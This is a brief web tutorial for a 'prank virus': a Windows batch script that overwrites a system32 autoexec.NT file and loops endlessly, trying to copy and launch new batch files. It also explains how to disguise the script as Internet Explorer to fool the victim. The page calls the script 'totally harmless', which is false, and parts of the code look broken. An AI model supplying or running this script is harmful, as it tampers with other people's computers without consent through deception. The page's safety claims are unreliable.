Make a Funny Prank Virus

Make a Funny Prank Virus

This is a totally harmless prank virus to pull on a friend or someone.




step 1




Open notepad




step 2


Type the following code in:



@echo off


echo checking system:


echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT


echo VIRUS DETECTED


Pause


echo DELETING VIRUS


pause


:1


dir /s


copy c:\tmp.bat


c:\docum~1\%username%\desktop\greatgame_%random%.bat




goto 1




a)


This will create a never ending stream of mindless code. This cannot be stopped easily.




b)


Save the file as "virus.bat"




c)


Have fun




note


You can make the virus look convincing by changing its name and Icon.

To stop the batch (the fake virus) from running, press Ctrl+C. Alternatively use the task manager or with vista, press the "x" button.

One way to do that is simply rename the file. Then right click the icon and click "properties". Then look for the icon you want. You might use the internet explorer icon and name it "Internet Explorer". You do need a shortcut to change the icon though. Just make a shortcut then change the icon in properties.





email


hackerblackbox.@gmail.com


Post a Comment

0 Comments